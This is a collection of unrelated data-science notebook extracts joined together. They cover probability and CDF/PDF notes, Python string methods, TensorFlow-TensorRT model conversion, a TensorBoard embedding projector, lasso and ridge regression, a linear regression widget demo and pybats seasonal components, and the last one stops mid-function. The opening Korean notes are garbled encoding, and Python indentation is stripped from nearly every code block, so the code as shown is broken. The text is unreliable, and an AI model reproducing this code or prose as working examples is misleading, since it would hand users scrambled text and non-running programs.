- ๋ค๋ง CDF์ ๋จ์ ์ ํน์ ๊ฐ์ ํ๋ฅ ์ ํํํ ์ ์๋ค. ์ฐ๋ฆฌ๊ฐ ์ฃผ๋ก ์๊ณ ์ถ์ดํ๋ ์ ๋ณด๋ฅผ ์๊ธฐ๊ฐ ์ด๋ ต๋ค. ๊ทธ๋์ ์ด CDF์ ์ง์ ์ ๋ฏธ๋ถํด์ ๊ทธ ๊ธฐ์ธ๊ธฐ ๊ฐ์ ๊ทธ๋ํ๋ก ํํํ๊ฒ ๋๋๋ฐ ์ด๊ฒ์ด **Probability Density Function**, **PDF**๋ค.
+ -๋ฌดํ๋์์ +๋ฌดํ๋๊น์ง PDF์ ๊ฐ๋ค์ ์ ๋ถํ๋ฉด ๊ฐ์ 1์ด๋๋ค.(์ ์ฒด ํ๋ฅ ์ด 1)
+ PDF์ ๊ฐ์ 0์ด์์ด๋ค. ์์์ผ ์ ์๋ค(ํ๋ฅ ์ด๋ฏ๋ก)
- Gaussian PDF
<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/7/74/Normal_Distribution_PDF.svg/720px-Normal_Distribution_PDF.svg.png" width="450">
- PMF: Probability Mass Function
<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/8/85/Discrete_probability_distrib.svg/440px-Discrete_probability_distrib.svg.png" width="450">
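As a rough numerical check of the CDF-to-PDF relationship described above, here is a sketch using only the standard library; the evaluation point `x = 1.0` and step size `h` are arbitrary choices:
```
import math

def std_normal_cdf(x):
    # Standard normal CDF via the error function
    return (1 + math.erf(x / math.sqrt(2))) / 2

# The PDF is the derivative of the CDF; approximate it with a central difference.
h = 1e-5
x = 1.0
pdf_numeric = (std_normal_cdf(x + h) - std_normal_cdf(x - h)) / (2 * h)
pdf_exact = math.exp(-x**2 / 2) / math.sqrt(2 * math.pi)
print(pdf_numeric, pdf_exact)  # both approximately 0.2420
```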
## 6.5 Continuous distribution
Already covered separately above, so skipped (pass).
## 6.6 Normal distribution
A distribution described by the Gaussian density function; it has two parameters, $\mu$ (mean) and $\sigma^2$ (variance). A short plotting sketch follows the figure below.

## 6.7 Central limit theorem
Central Limit Theorem (CLT): if n independent random variables all follow the same probability distribution, the distribution of their sample mean approaches a normal distribution when n is reasonably large.
```
from collections import Counter
import matplotlib.pyplot as plt
import math
import random  # used by bernoulli_trial below
def bernoulli_trial(p):
return 1 if random.random() < p else 0
def binomial(p, n):
return sum(bernoulli_trial(p) for _ in range(n))
def normal_cdf(x, mu=0,sigma=1):
return (1 + math.erf((x - mu) / math.sqrt(2) / sigma)) / 2
def make_hist(p, n, num_points):
data = [binomial(p, n) for _ in range(num_points)]
# use a bar chart to show the actual binomial samples
histogram = Counter(data)
plt.bar([x - 0.4 for x in histogram.keys()],
[v / num_points for v in histogram.values()],
0.8,
color='0.75')
mu = p * n
sigma = math.sqrt(n * p * (1 - p))
# use a line chart to show the normal approximation
xs = range(min(data), max(data) + 1)
ys = [normal_cdf(i + 0.5, mu, sigma) - normal_cdf(i - 0.5, mu, sigma)
for i in xs]
plt.plot(xs,ys)
plt.show()
make_hist(0.75,100,1000)
make_hist(0.50,100,1000)
```
# Advanced Strings
String objects have a variety of methods we can use to save time and add functionality. Let's explore some of them in this lecture:
```
s = 'hello world'
```
## Changing case
We can use methods to capitalize the first word of a string, or change the case of the entire string.
```
# Capitalize first word in string
s.capitalize()
s.upper()
s.lower()
```
Remember, strings are immutable. None of the above methods change the string in place, they only return modified copies of the original string.
```
s
```
To change a string requires reassignment:
```
s = s.upper()
s
s = s.lower()
s
```
## Location and Counting
```
s.count('o') # returns the number of occurrences, without overlap
s.find('o')  # returns the starting index position of the first occurrence
```
## Formatting
The <code>center()</code> method returns a copy of the string centered in a field of a given width, padded on both sides with a provided character. Personally, I've never actually used this in code as it seems pretty esoteric...
```
s.center(20,'z')
```
The <code>expandtabs()</code> method will expand tab notations <code>\t</code> into spaces:
```
'hello\thi'.expandtabs()
```
## is check methods
The various methods below check whether the string satisfies a certain property, such as its case. Let's explore them:
```
s = 'hello'
```
<code>isalnum()</code> will return True if all characters in **s** are alphanumeric
```
s.isalnum()
```
<code>isalpha()</code> will return True if all characters in **s** are alphabetic
```
s.isalpha()
```
<code>islower()</code> will return True if all cased characters in **s** are lowercase and there is
at least one cased character in **s**, False otherwise.
```
s.islower()
```
<code>isspace()</code> will return True if all characters in **s** are whitespace.
```
s.isspace()
```
<code>istitle()</code> will return True if **s** is a title cased string and there is at least one character in **s**, i.e. uppercase characters may only follow uncased characters and lowercase characters only cased ones. It returns False otherwise.
```
s.istitle()
```
<code>isupper()</code> will return True if all cased characters in **s** are uppercase and there is
at least one cased character in **s**, False otherwise.
```
s.isupper()
```
Another method is <code>endswith()</code> which is essentially the same as a boolean check on <code>s[-1]</code>
```
s.endswith('o')
```
## Built-in Reg. Expressions
Strings have some built-in methods that can resemble regular expression operations.
We can use <code>split()</code> to split the string at a certain element and return a list of the results.
We can use <code>partition()</code> to return a three-element tuple: the part of the string before the first occurrence of the separator, the separator itself, and the part after it.
```
s.split('e')
s.partition('l')
```
Great! You should now feel comfortable using the variety of methods that are built-in string objects!
# TF-TRT Inference from Saved Model with TensorFlow 2
In this notebook, we demonstrate the process of creating a TF-TRT optimized model from a TensorFlow *saved model*.
This notebook was designed to run with TensorFlow 2.x, which is included in NVIDIA NGC TensorFlow containers starting from `nvcr.io/nvidia/tensorflow:19.12-tf2-py3`; these can be downloaded from the [NGC website](https://ngc.nvidia.com/catalog/containers/nvidia:tensorflow).
## Notebook Content
1. [Pre-requisite: data and model](#1)
1. [Verifying the original FP32 model](#2)
1. [Creating TF-TRT FP32 model](#3)
1. [Creating TF-TRT FP16 model](#4)
1. [Creating TF-TRT INT8 model](#5)
1. [Calibrating TF-TRT INT8 model with raw JPEG images](#6)
## Quick start
We will run this demonstration with a saved ResNet-50 v1 model, to be downloaded and stored at `/path/to/saved_model`.
The INT8 calibration process requires access to a small but representative sample of real training or validation data.
We will use the ImageNet dataset stored in TFRecord format. Google provides an excellent all-in-one script for downloading and preparing the ImageNet dataset at
https://github.com/tensorflow/models/blob/master/research/inception/inception/data/download_and_preprocess_imagenet.sh.
To run this notebook, start the NGC TF container, providing the correct path to the ImageNet validation data `/path/to/image_net` and to the folder `/path/to/saved_model` containing the TF saved model:
```bash
nvidia-docker run --rm -it -p 8888:8888 -v /path/to/image_net:/data -v /path/to/saved_model:/saved_model --name TFTRT nvcr.io/nvidia/tensorflow:19.12-tf2-py3
```
Within the container, we then start Jupyter notebook with:
```bash
jupyter notebook --ip 0.0.0.0 --port 8888 --allow-root
```
Connect to the Jupyter notebook web interface on your host at http://localhost:8888.
<a id="1"></a>
## 1. Pre-requisite: data and model
We first install some extra packages and external dependencies needed, for example, to preprocess the ImageNet data.
```
%%bash
pushd /workspace/nvidia-examples/tensorrt/tftrt/examples/object_detection/
bash ../helper_scripts/install_pycocotools.sh;
popd
import os
os.environ['CUDA_VISIBLE_DEVICES']='0'
import time
import logging
import numpy as np
import tensorflow as tf
print("TensorFlow version: ", tf.__version__)
from tensorflow.python.compiler.tensorrt import trt_convert as trt
from tensorflow.python.saved_model import tag_constants
logging.getLogger("tensorflow").setLevel(logging.ERROR)
# check TensorRT version
print("TensorRT version: ")
!dpkg -l | grep nvinfer
```
### Data
We verify that the correct ImageNet data folder has been mounted and validation data files of the form `validation-00xxx-of-00128` are available.
```
def get_files(data_dir, filename_pattern):
if data_dir == None:
return []
files = tf.io.gfile.glob(os.path.join(data_dir, filename_pattern))
if files == []:
raise ValueError('Can not find any files in {} with '
'pattern "{}"'.format(data_dir, filename_pattern))
return files
VALIDATION_DATA_DIR = "/data"
validation_files = get_files(VALIDATION_DATA_DIR, 'validation*')
print('There are %d validation files. \n%s\n%s\n...'%(len(validation_files), validation_files[0], validation_files[-1]))
```
### TF saved model
If not already downloaded, we download and work with a ResNet-50 v1 saved model from https://github.com/tensorflow/models/tree/master/official/resnet
```
%%bash
FILE=/saved_model/resnet_v1_50_2016_08_28.tar.gz
if [ -f $FILE ]; then
echo "The file '$FILE' exists."
else
echo "The file '$FILE' in not found. Downloading..."
wget -P /saved_model/ http://download.tensorflow.org/models/official/20181001_resnet/savedmodels/resnet_v1_fp32_savedmodel_NHWC.tar.gz
fi
tar -xzvf /saved_model/resnet_v1_fp32_savedmodel_NHWC.tar.gz -C /saved_model
```
### Helper functions
We define a few helper functions to read and preprocess ImageNet data from TFRecord files.
```
def deserialize_image_record(record):
feature_map = {
'image/encoded': tf.io.FixedLenFeature([ ], tf.string, ''),
'image/class/label': tf.io.FixedLenFeature([1], tf.int64, -1),
'image/class/text': tf.io.FixedLenFeature([ ], tf.string, ''),
'image/object/bbox/xmin': tf.io.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymin': tf.io.VarLenFeature(dtype=tf.float32),
'image/object/bbox/xmax': tf.io.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymax': tf.io.VarLenFeature(dtype=tf.float32)
}
with tf.name_scope('deserialize_image_record'):
obj = tf.io.parse_single_example(record, feature_map)
imgdata = obj['image/encoded']
label = tf.cast(obj['image/class/label'], tf.int32)
bbox = tf.stack([obj['image/object/bbox/%s'%x].values
for x in ['ymin', 'xmin', 'ymax', 'xmax']])
bbox = tf.transpose(tf.expand_dims(bbox, 0), [0,2,1])
text = obj['image/class/text']
return imgdata, label, bbox, text
from preprocessing import vgg_preprocess as vgg_preprocessing
def preprocess(record):
# Parse TFRecord
imgdata, label, bbox, text = deserialize_image_record(record)
#label -= 1 # Change to 0-based if not using background class
try: image = tf.image.decode_jpeg(imgdata, channels=3, fancy_upscaling=False, dct_method='INTEGER_FAST')
except: image = tf.image.decode_png(imgdata, channels=3)
image = vgg_preprocessing(image, 224, 224)
return image, label
#Define some global variables
BATCH_SIZE = 64
```
<a id="2"></a>
## 2. Verifying the original FP32 model
We demonstrate the conversion process with a ResNet-50 v1 model. First, we inspect the original TensorFlow model.
```
SAVED_MODEL_DIR = "/saved_model/resnet_v1_fp32_savedmodel_NHWC/1538686669/"
```
We employ `saved_model_cli` to inspect the inputs and outputs of the model.
```
!saved_model_cli show --all --dir $SAVED_MODEL_DIR
```
This gives us the names of the input and output tensors: `input_tensor:0` and `softmax_tensor:0`, respectively. Also note that the number of output classes here is 1001 instead of the 1000 ImageNet classes. This is because the network was trained with an extra background class.
```
INPUT_TENSOR = 'input_tensor:0'
OUTPUT_TENSOR = 'softmax_tensor:0'
```
Next, we define a function that loads a saved model and measures its speed and accuracy on the validation data.
```
def benchmark_saved_model(SAVED_MODEL_DIR, BATCH_SIZE=64):
# load saved model
saved_model_loaded = tf.saved_model.load(SAVED_MODEL_DIR, tags=[tag_constants.SERVING])
signature_keys = list(saved_model_loaded.signatures.keys())
print(signature_keys)
infer = saved_model_loaded.signatures['serving_default']
print(infer.structured_outputs)
# prepare dataset iterator
dataset = tf.data.TFRecordDataset(validation_files)
dataset = dataset.map(map_func=preprocess, num_parallel_calls=20)
dataset = dataset.batch(batch_size=BATCH_SIZE, drop_remainder=True)
print('Warming up for 50 batches...')
cnt = 0
for x, y in dataset:
labeling = infer(x)
cnt += 1
if cnt == 50:
break
print('Benchmarking inference engine...')
num_hits = 0
num_predict = 0
start_time = time.time()
for x, y in dataset:
labeling = infer(x)
preds = labeling['classes'].numpy()
num_hits += np.sum(preds == y)
num_predict += preds.shape[0]
print('Accuracy: %.2f%%'%(100*num_hits/num_predict))
print('Inference speed: %.2f samples/s'%(num_predict/(time.time()-start_time)))
benchmark_saved_model(SAVED_MODEL_DIR, BATCH_SIZE=BATCH_SIZE)
```
<a id="3"></a>
## 3. Creating TF-TRT FP32 model
Next, we convert the native TF FP32 model to TF-TRT FP32, then verify model accuracy and inference speed.
```
FP32_SAVED_MODEL_DIR = SAVED_MODEL_DIR+"_TFTRT_FP32/1"
!rm -rf $FP32_SAVED_MODEL_DIR
conversion_params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
precision_mode=trt.TrtPrecisionMode.FP32)
converter = trt.TrtGraphConverterV2(
input_saved_model_dir=SAVED_MODEL_DIR,
conversion_params=conversion_params)
converter.convert()
converter.save(FP32_SAVED_MODEL_DIR)
benchmark_saved_model(FP32_SAVED_MODEL_DIR, BATCH_SIZE=BATCH_SIZE)
```
<a id="4"></a>
## 4. Creating TF-TRT FP16 model
Next, we convert the native TF FP32 model to TF-TRT FP16, then verify model accuracy and inference speed.
```
FP16_SAVED_MODEL_DIR = SAVED_MODEL_DIR+"_TFTRT_FP16/1"
!rm -rf $FP16_SAVED_MODEL_DIR
conversion_params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
precision_mode=trt.TrtPrecisionMode.FP16)
converter = trt.TrtGraphConverterV2(
input_saved_model_dir=SAVED_MODEL_DIR,
conversion_params=conversion_params)
converter.convert()
converter.save(FP16_SAVED_MODEL_DIR)
benchmark_saved_model(FP16_SAVED_MODEL_DIR, BATCH_SIZE=BATCH_SIZE)
```
<a id="5"></a>
## 5. Creating TF-TRT INT8 model
Creating a TF-TRT INT8 inference model requires two steps:
- Step 1: Prepare a calibration dataset
- Step 2: Convert and calibrate the TF-TRT INT8 inference engine
### Step 1: Prepare a calibration dataset
Creating a TF-TRT INT8 model requires a small calibration dataset. This dataset should ideally be representative of the data seen in production; it is used to build a histogram of activation values for each layer in the network so that effective 8-bit quantization ranges can be chosen.
```
num_calibration_batches = 2
# prepare calibration dataset
dataset = tf.data.TFRecordDataset(validation_files)
dataset = dataset.map(map_func=preprocess, num_parallel_calls=20)
dataset = dataset.batch(batch_size=BATCH_SIZE, drop_remainder=True)
calibration_dataset = dataset.take(num_calibration_batches)
def calibration_input_fn():
for x, y in calibration_dataset:
yield (x, )
```
### Step 2: Convert and calibrate the TF-TRT INT8 inference engine
The calibration step may take a while to complete.
```
# set a directory to write the saved model
INT8_SAVED_MODEL_DIR = SAVED_MODEL_DIR + "_TFTRT_INT8/1"
!rm -rf $INT8_SAVED_MODEL_DIR
conversion_params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
precision_mode=trt.TrtPrecisionMode.INT8)
converter = trt.TrtGraphConverterV2(
input_saved_model_dir=SAVED_MODEL_DIR,
conversion_params=conversion_params)
converter.convert(calibration_input_fn=calibration_input_fn)
converter.save(INT8_SAVED_MODEL_DIR)
```
### Benchmarking INT8 saved model
Finally we reload and verify the accuracy and performance of the INT8 saved model from disk.
```
benchmark_saved_model(INT8_SAVED_MODEL_DIR, BATCH_SIZE=BATCH_SIZE)
!saved_model_cli show --all --dir $INT8_SAVED_MODEL_DIR
```
<a id="6"></a>
## 6. Calibrating TF-TRT INT8 model with raw JPEG images
As an alternative to taking data in TFRecord format, in this section we demonstrate the process of calibrating a TF-TRT INT8 model from a directory of raw JPEG images. We assume that raw images have been mounted at `/data/Calibration_data`.
As a rule of thumb, calibration data should be a small but representative set of images, similar to what is expected in deployment. Empirically, for common network architectures trained on ImageNet data, a calibration set of 500-1000 images provides good accuracy. As such, a good strategy for a dataset such as ImageNet is to choose one sample from each class; a sketch of this strategy is shown below.
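A minimal sketch of the one-sample-per-class strategy, assuming a hypothetical layout in which raw images are grouped into one sub-directory per class (for example `/data/imagenet_raw/<class_name>/*.JPEG`); the path and variable names here are illustrative, not part of the container setup above:
```
import os
import random

raw_dir = "/data/imagenet_raw"  # hypothetical directory: one sub-folder per class
per_class_files = []
for class_name in sorted(os.listdir(raw_dir)):
    class_dir = os.path.join(raw_dir, class_name)
    if os.path.isdir(class_dir):
        images = os.listdir(class_dir)
        if images:
            # pick one representative image per class
            per_class_files.append(os.path.join(class_dir, random.choice(images)))
print('Selected %d calibration images' % len(per_class_files))
```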
```
data_directory = "/data/Calibration_data"
calibration_files = [os.path.join(path, name) for path, _, files in os.walk(data_directory) for name in files]
print('There are %d calibration files. \n%s\n%s\n...'%(len(calibration_files), calibration_files[0], calibration_files[-1]))
```
We define a helper function to read and preprocess an image from a JPEG file.
```
def parse_file(filepath):
image = tf.io.read_file(filepath)
image = tf.image.decode_jpeg(image, channels=3)
image = vgg_preprocessing(image, 224, 224)
return image
num_calibration_batches = 2
# prepare calibration dataset
dataset = tf.data.Dataset.from_tensor_slices(calibration_files)
dataset = dataset.map(map_func=parse_file, num_parallel_calls=20)
dataset = dataset.batch(batch_size=BATCH_SIZE)
dataset = dataset.repeat(None)
calibration_dataset = dataset.take(num_calibration_batches)
def calibration_input_fn():
for x in calibration_dataset:
yield (x, )
```
Next, we proceed with the two-stage process of creating and calibrating the TF-TRT INT8 model.
### Convert and calibrate the TF-TRT INT8 inference engine
```
# set a directory to write the saved model
INT8_SAVED_MODEL_DIR = SAVED_MODEL_DIR + "_TFTRT_INT8/2"
!rm -rf $INT8_SAVED_MODEL_DIR
conversion_params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
precision_mode=trt.TrtPrecisionMode.INT8)
converter = trt.TrtGraphConverterV2(
input_saved_model_dir=SAVED_MODEL_DIR,
conversion_params=conversion_params)
converter.convert(calibration_input_fn=calibration_input_fn)
converter.save(INT8_SAVED_MODEL_DIR)
```
As before, we can benchmark the speed and accuracy of the resulting model.
```
benchmark_saved_model(INT8_SAVED_MODEL_DIR)
```
## Conclusion
In this notebook, we have demonstrated the process of creating TF-TRT inference models from an original TF FP32 *saved model*. In every case, we have also verified the accuracy and speed of the resulting model.
```
try:
# %tensorflow_version only exists in Colab.
%tensorflow_version 2.x
except Exception:
pass
%load_ext tensorboard
import os
import tensorflow as tf
import tensorflow_datasets as tfds
from tensorboard.plugins import projector
(train_data, test_data), info = tfds.load(
"imdb_reviews/subwords8k",
split=(tfds.Split.TRAIN, tfds.Split.TEST),
with_info=True,
as_supervised=True,
)
encoder = info.features["text"].encoder
# shuffle and pad the data.
train_batches = train_data.shuffle(1000).padded_batch(
10, padded_shapes=((None,), ())
)
test_batches = test_data.shuffle(1000).padded_batch(
10, padded_shapes=((None,), ())
)
train_batch, train_labels = next(iter(train_batches))
# Create an embedding layer
embedding_dim = 16
embedding = tf.keras.layers.Embedding(encoder.vocab_size, embedding_dim)
# Train this embedding as part of a keras model
model = tf.keras.Sequential(
[
embedding, # The embedding layer should be the first layer in a model.
tf.keras.layers.GlobalAveragePooling1D(),
tf.keras.layers.Dense(16, activation="relu"),
tf.keras.layers.Dense(1),
]
)
# Compile model
model.compile(
optimizer="adam",
loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
metrics=["accuracy"],
)
# Train model
history = model.fit(
train_batches, epochs=1, validation_data=test_batches, validation_steps=20
)
# Set up a logs directory, so Tensorboard knows where to look for files
log_dir='/tmp/logs/imdb-example/'
if not os.path.exists(log_dir):
os.makedirs(log_dir)
# Save Labels separately on a line-by-line manner.
with open(os.path.join(log_dir, 'metadata.tsv'), "w") as f:
for subwords in encoder.subwords:
f.write("{}\n".format(subwords))
# Fill in the rest of the labels with "unknown"
for unknown in range(1, encoder.vocab_size - len(encoder.subwords)):
f.write("unknown #{}\n".format(unknown))
# Save the weights we want to analyse as a variable. Note that the first
# value represents any unknown word, which is not in the metadata, so
# we will remove that value.
weights = tf.Variable(model.layers[0].get_weights()[0][1:])
# Create a checkpoint from embedding, the filename and key are
# name of the tensor.
checkpoint = tf.train.Checkpoint(embedding=weights)
checkpoint.save(os.path.join(log_dir, "embedding.ckpt"))
# Set up config
config = projector.ProjectorConfig()
embedding = config.embeddings.add()
# The name of the tensor will be suffixed by `/.ATTRIBUTES/VARIABLE_VALUE`
embedding.tensor_name = "embedding/.ATTRIBUTES/VARIABLE_VALUE"
embedding.metadata_path = 'metadata.tsv'
projector.visualize_embeddings(log_dir, config)
```
```
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from sklearn import linear_model
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.linear_model import LinearRegression, Lasso, LassoCV, Ridge, RidgeCV
from sklearn.preprocessing import scale
from sklearn.metrics import mean_squared_error
# Note: sklearn.cross_validation was removed in modern scikit-learn;
# train_test_split from sklearn.model_selection is used instead below.
%matplotlib inline
data = pd.read_csv("winequality-red.csv", sep=";")
intercept = np.ones((len(data),1))
data.insert(0, "intercept", intercept, allow_duplicates = False)
X= data.drop(columns = "quality")
y = data["quality"]
alphas = np.logspace(-4,-1,10)
lasso = Lasso(max_iter=10000, normalize=True)
coefs = []
for a in alphas:
lasso.set_params(alpha=a)
lasso.fit(X, y)
coefs.append(lasso.coef_)
ax = plt.gca()
ax.plot(alphas, coefs)
ax.set_xscale('log')
plt.axis('tight')
plt.xlabel('alpha')
plt.ylabel('weights')
```
#### Multiple linear regression
```
lin_reg = LinearRegression()
MSE = cross_val_score(lin_reg, X, y, scoring = "neg_mean_squared_error", cv = 5)
mean_MSE = np.mean(MSE)
print(mean_MSE)
```
#### Ridge Regression
```
from sklearn.model_selection import GridSearchCV
from sklearn.linear_model import Ridge
ridge = Ridge()
alphas = {"alpha": np.logspace(-4,-1,10)}
ridge_regressor = GridSearchCV(ridge, alphas, scoring="neg_mean_squared_error", cv = 5)
ridge_regressor.fit(X,y)
print(ridge_regressor.best_params_)
print(ridge_regressor.best_score_)
```
#### Lasso Regression
```
from sklearn.linear_model import Lasso
lasso = Lasso()
alphas = {"alpha": np.logspace(-4,-1,10)}
lasso_regressor = GridSearchCV(lasso, alphas, scoring = "neg_mean_squared_error", cv = 5)
lasso_regressor.fit(X,y)
print(lasso_regressor.best_params_)
print(lasso_regressor.best_score_)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)
alphas = np.logspace(-4,-1,10)
scores = np.empty_like(alphas)
for i, a in enumerate(alphas):
lasso = linear_model.Lasso()
lasso.set_params(alpha= a)
lasso.fit(X_train,y_train)
scores[i] = lasso.score(X_test,y_test)
print(a, lasso.coef_)
lassocv = linear_model.LassoCV()
lassocv.fit(X,y)
lassocv_score = lassocv.score(X, y)
lassocv_alpha = lassocv.alpha_
print('CV', lassocv.coef_)
plt.plot(alphas, scores, '-ko')
plt.axhline(lassocv_score, color='b', ls='--')
plt.axvline(lassocv_alpha, color='b', ls='--')
plt.xlabel(r'$\alpha$')
plt.ylabel('Score')
sns.despine(offset=15)
```
# Linear Regression
Imports and Helper Functions
---
```
%matplotlib inline
from ipywidgets import interactive_output
import ipywidgets as widgets
import numpy as np
from matplotlib import pyplot as plt
```
## Data Set Generation
```
N = 100
datasets = {}
X = 20 * (np.random.rand(100, 1) - 0.5) # creates random values in [-10, 10) interval.
X[10] = 8
Y = 0.5 * X - 1.2 + np.random.randn(100, 1)
datasets["Linear"] = (X, Y)
Y = 0.1 * (X ** 2) + 0.5 * X - 2 + np.random.randn(100, 1)
datasets["Quadratic"] = (X, Y)
Y = 0.2 * (X ** 3) + 0.6 * (X ** 2) - 0.5 * X - 1 + np.random.randn(100, 1)
datasets["Cubic"] = (X, Y)
Y = 0.5 * X - 1.2 + np.random.randn(100, 1)
Y[10] = -8
datasets["Outlier"] = (X, Y)
```
## Define Prediction, Loss, and Learning Function
```
def predict(X, weight, bias):
#Compute Yhat given X and parameters
Yhat = weight * X + bias
return Yhat
def squared_loss(Y, Yhat):
#Compute the empirical risk given Y and Yhat
R = np.mean((Y - Yhat) ** 2)
return (R)
def fit(X, Y):
#Learn the model parameters
N = X.shape[0]
    X = np.hstack((X, np.ones((N, 1))))  # Bias absorption: append a column of ones
theta = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(Y)
weight = theta[0]
bias = theta[1]
return weight, bias
```
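As a quick sanity check, here is a minimal usage sketch (it assumes the data-generation and function cells above have been run) that fits the synthetic `Linear` dataset; the recovered parameters should be close to the true weight 0.5 and bias -1.2:
```
X_lin, Y_lin = datasets["Linear"]
weight, bias = fit(X_lin, Y_lin)
Yhat = predict(X_lin, weight, bias)
print("weight: %.3f  bias: %.3f  empirical risk: %.3f"
      % (weight.item(), bias.item(), squared_loss(Y_lin, Yhat)))
```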
## Interaction Functions and UI
```
def plot_model(weight=0, bias=0, dataset=None, N=0, learn=False, show_residuals=False):
plt.figure(figsize=(10, 6))
plt.rcParams.update({'font.size': 12})
if dataset is not None and N > 0:
X, Y = datasets[dataset]
X = X[:N]
Y = Y[:N]
if N >= 2 and learn:
weight, bias = fit(X, Y)
Yhat = predict(X, weight, bias)
R = squared_loss(Y, Yhat)
plt.plot(X, Y, 'ko')
if show_residuals:
for n in range(N):
plt.plot([X[n], X[n]], [Y[n], Yhat[n]], 'k-', alpha=0.5)
else:
R = 0
xs = np.linspace(-10, 10, 200)
ys = xs * weight + bias
plt.plot(xs, ys, '-b')
plt.grid("True")
plt.xlim(-10, 10)
plt.ylim(-10, 10)
plt.title("weight: %.2f bias: %.2f Empirical Risk: %.2f" % (weight, bias, R))
plt.show()
ww = widgets.FloatSlider(value=0, min=-1, max=1, step=.1, description="Weight", continuous_update=False)
wb = widgets.FloatSlider(value=0, min=-10, max=10, step=.1, description="Bias", continuous_update=False)
wd = widgets.Dropdown(options=["Linear", "Quadratic","Cubic","Outlier"], description="Dataset")
wn = widgets.IntSlider(value=0, min=-1, max=N, step=1, description="N", continuous_update=False)
wl = widgets.Checkbox(value=False, description="Learn")
wr = widgets.Checkbox(value=False, description="Residuals")
out = interactive_output(
plot_model,
{"weight": ww, "bias": wb, "dataset": wd, "N": wn, "learn": wl, "show_residuals": wr}
)
out.layout.height = '400px'
box1 = widgets.HBox([ww, wb, wr])
box2 = widgets.HBox([wd, wn, wl])
ui = widgets.VBox([box1, box2])
```
## Linear Regression Demo
```
display(out, ui)
```
```
#hide
%load_ext autoreload
%autoreload 2
# default_exp seasonal
```
# Seasonal Components
> This module contains functions to define the seasonal components in a DGLM. These are *harmonic* seasonal components, meaning they are defined by sine and cosine functions with a specific period. For example, when working with daily time series we often use a weekly seasonal effect of period 7 or an annual seasonal effect of period 365.
```
#hide
#exporti
import numpy as np
from pybats_nbdev.forecast import forecast_aR, forecast_R_cov
```
## Seasonal Components for a DGLM
```
#export
def seascomp(period, harmComponents):
p = len(harmComponents)
n = 2*p
F = np.zeros([n, 1])
F[0:n:2] = 1
G = np.zeros([n, n])
for j in range(p):
c = np.cos(2*np.pi*harmComponents[j]/period)
s = np.sin(2*np.pi*harmComponents[j]/period)
idx = 2*j
G[idx:(idx+2), idx:(idx+2)] = np.array([[c, s],[-s, c]])
return [F, G]
```
This function is called from `dglm.__init__` to define the seasonal components.
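As a small illustration (a sketch that simply calls the `seascomp` function defined above), a weekly component with a single harmonic produces a 2-dimensional harmonic state whose evolution matrix is a rotation by $2\pi/7$:
```
F_week, G_week = seascomp(period=7, harmComponents=[1])
print(F_week.T)  # regression vector: a 1 in the first slot of each harmonic pair
print(G_week)    # 2x2 harmonic rotation matrix with angle 2*pi*1/7
```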
```
#exporti
def createFourierToSeasonalL(period, harmComponents, Fseas, Gseas):
p = len(harmComponents)
L = np.zeros([period, 2*p])
L[0,:] = Fseas.reshape(-1)
for i in range(1, period):
L[i,:] = L[i-1,:] @ Gseas
return L
#export
def fourierToSeasonal(mod, comp=0):
phi = mod.L[comp] @ mod.m[mod.iseas[comp]]
var = mod.L[comp] @ mod.C[np.ix_(mod.iseas[comp], mod.iseas[comp])] @ mod.L[comp].T
return phi, var
```
This function transforms the seasonal component of a model from its Fourier representation into more interpretable seasonal effects. For example, if `seasPeriods = [7]`, then this returns a vector of length $7$ containing each of the seven seasonal effects.
A simple use case is given below. For a more detailed use of this function, see the following [example](https://github.com/lavinei/pybats_nbdev/blob/master/examples/Poisson_DGLM_In_Depth_Example.ipynb).
```
import numpy as np
import pandas as pd
from pybats_nbdev.analysis import analysis
from pybats_nbdev.shared import load_sales_example2
data = load_sales_example2()
prior_length = 21 # Number of days of data used to set prior
mod = analysis(data.Sales.values, data[['Price', 'Promotion']].values, k=1,
family='poisson',
seasPeriods=[7], seasHarmComponents=[[1,2,3]],
prior_length=prior_length, dates=data.index,
ret = ['model'])
seas_mean, seas_cov = fourierToSeasonal(mod)
days = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
lastday = data.index[-1]
days = [*days[lastday.isoweekday()-1:], *days[:lastday.isoweekday()-1]]
seas_eff = pd.DataFrame({'Day':days,
'Effect Mean':np.exp(seas_mean.reshape(-1))})
seas_eff
#exporti
def fourierToSeasonalFxnl(L, m, C, iseas):
phi = L @ m[iseas]
var = L @ C[np.ix_(iseas, iseas)] @ L.T
return phi, var
#exporti
def get_seasonal_effect_fxnl(L, m, C, iseas):
phi, var = fourierToSeasonalFxnl(L, m, C, iseas)
return phi[0], var[0, 0]
#exporti
def sample_seasonal_effect_fxnl(L, m, C, iseas, delVar, n, nsamps):
phi_samps = np.zeros([nsamps])
phi, var = fourierToSeasonalFxnl(L, m, C, iseas)
phi_samps[:] = phi[0] + np.sqrt(var[0,0])*np.random.standard_t(delVar*n, size = [nsamps])
return phi_samps
#exporti
def forecast_weekly_seasonal_factor(mod, k, sample = False, nsamps = 1):
a, R = forecast_aR(mod, k)
idx = np.where(np.array(mod.seasPeriods) == 7)[0][0]
if sample:
return sample_seasonal_effect_fxnl(mod.L[idx], a, R, mod.iseas[idx], mod.delVar, mod.n, nsamps)
else:
return get_seasonal_effect_fxnl(mod.L[idx], a, R, mod.iseas[idx])
#exporti
def forecast_path_weekly_seasonal_factor(mod, k, today, period):
phi_mu = [np.zeros([period]) for h in range(k)]
phi_sigma = [np.zeros([period, period]) for h in range(k)]
phi_psi = [np.zeros([period, period, h]) for h in range(1, k)]
idx = np.where(np.array(mod.seasPeriods) == 7)[0][0]
L = mod.L[idx]
iseas = mod.iseas[idx]
for h in range(k):
# Get the marginal a, R
a, R = forecast_aR(mod, h + 1)
m, v = get_seasonal_effect_fxnl(L, a, R, iseas)
day = (today + h) % period
phi_mu[h][day] = m
